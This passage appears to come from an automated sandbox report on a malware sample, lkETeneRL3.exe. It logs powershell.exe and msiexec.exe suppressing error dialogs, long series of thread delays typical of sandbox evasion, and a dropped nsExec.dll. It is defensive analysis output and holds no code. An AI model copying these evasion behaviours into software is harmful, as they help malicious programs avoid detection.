Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598686	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597702	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596061	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595952	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595624	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595392	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594717	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594609	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5467			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4202			Jump to behavior

Source: C:\Users\user\Desktop\lkETeneRL3.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv37AB.tmp\nsExec.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7876	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2848	Thread sleep count: 9440 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 2848	Thread sleep count: 417 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599124s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598686s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597702s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 5380	Thread sleep time: -597265s >= -30000s	Jump to behavior
